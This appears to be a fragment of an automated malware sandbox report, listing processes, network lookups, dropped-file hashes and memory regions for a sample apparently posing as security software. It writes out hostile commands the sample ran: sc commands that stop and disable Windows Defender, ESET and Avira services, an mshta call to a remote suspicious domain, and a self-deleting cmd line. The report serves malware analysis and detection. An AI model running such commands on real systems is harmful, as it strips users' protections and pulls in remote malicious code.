| C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe | "C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe" |
| C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | "C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe" -e -p7k3y195xurds9tc |
| C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | "C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe" |
| C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\56M04A~1.EXE" >> NUL |
| C:\Windows\SysWOW64\mshta.exe | mshta.exe "http://galaint.onlinesecstats.info/?0=155&1=1&2=1&3=54&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=tmikvgppmh&14=1" |
| C:\Windows\SysWOW64\sc.exe | sc stop WinDefend |
| C:\Windows\SysWOW64\sc.exe | sc config WinDefend start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc stop msmpsvc |
| C:\Windows\SysWOW64\sc.exe | sc config msmpsvc start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc config ekrn start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc stop AntiVirService |
| C:\Windows\SysWOW64\sc.exe | sc config AntiVirService start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc config AntiVirSchedulerService start= disabled |
| C:\Program Files\Internet Explorer\iexplore.exe | "C:\Program Files\Internet Explorer\iexplore.exe" res://ieframe.dll/dnserrordiagoff.htm#http://www.cmyip.com/ |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4884 CREDAT:17410 /prefetch:2 |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dl.dropbox.com | udp |
| NL | 162.125.65.15:80 | dl.dropbox.com | tcp |
| NL | 162.125.65.15:443 | dl.dropbox.com | tcp |
| US | 8.8.8.8:53 | galaint.onlinesecstats.info | udp |
| US | 8.8.8.8:53 | 15.65.125.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | realipshow.info | udp |
| US | 8.8.8.8:53 | www.cmyip.com | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.19.199.152.in-addr.arpa | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe
| MD5 | cb29fc6c4d1be6464d118d58750c7286 |
| SHA1 | d942e69817be663057275b373b308f6f4a5bdea4 |
| SHA256 | a0ce0051ee944ea54a214588d183deb2b7e72d6aa9d9180fcd16888cf232bef9 |
| SHA512 | bd1891c0f015ec27c3a5f99c9b89f7f6cd87b9edd2d4e59a79ebfcb1fb35d836b597fec509ca7694ef608e2dd86e0d8d68617587fe649df8fe66db6bd6f492a7 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe
| MD5 | c0ecef6a5e45a04e9b341ef74a4dd08f |
| SHA1 | f1d33665ab2ae2c658bbe6f64dee0986c3ba3d5a |
| SHA256 | 7f7b866445fd82fb423144bc7403af987a0ae4c1e27d38387a7ba84708856f5d |
| SHA512 | fdb0907b853db79d32ca8a0b23fed2c31e2886d247a7d09dc6154b42af734c8ee8da08c9bc7078e9dbc53b15a24d7a85bfabaa0ccd281f314a993a23c15157ac |
memory/3764-21-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-26-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/3764-27-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-35-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-36-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-48-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-49-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-50-0x0000000000400000-0x00000000007D9000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
| MD5 | 36c1eda34c01e5ce21e7bba810202b7a |
| SHA1 | 12a0a24749dae9e0688c402237f071df006beeb7 |
| SHA256 | 65c8cd605767e6e40458e14088393d6d8f389a12d83add67698c613df5498a44 |
| SHA512 | 5a615fba0a3b863d67bacf4df3d161a64dde2e0a62f994201b124973f27aa21999fc3be603b7a3f2d0c6cf04578501d1f4f617d03eed5897ecd1867599c36064 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
| MD5 | ee4ada789158c1e5a14d597cf1d5edd0 |
| SHA1 | 9593aee78d30d51ab93d6a29dc4dc873e0d466b6 |
| SHA256 | 903a6d82bf2fe8951104cf90d9f64aab0fbded30a2246e678a80d07868569b4f |
| SHA512 | a6214f62e5089512aeaabab7c4bb38e8663fb55d5f4129c57e726723dad10802ec40c3dc836087713b77c1874c12f177bf2b2998fd3e52f4210c1c5307885c16 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver7FBA.tmp
| MD5 | 1a545d0052b581fbb2ab4c52133846bc |
| SHA1 | 62f3266a9b9925cd6d98658b92adec673cbe3dd3 |
| SHA256 | 557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1 |
| SHA512 | bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d |
memory/2776-69-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-70-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-71-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-72-0x0000000000400000-0x00000000007D9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\H4VCA4X1\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |
memory/2776-83-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-85-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-86-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-87-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-88-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-89-0x0000000000400000-0x00000000007D9000-memory.dmp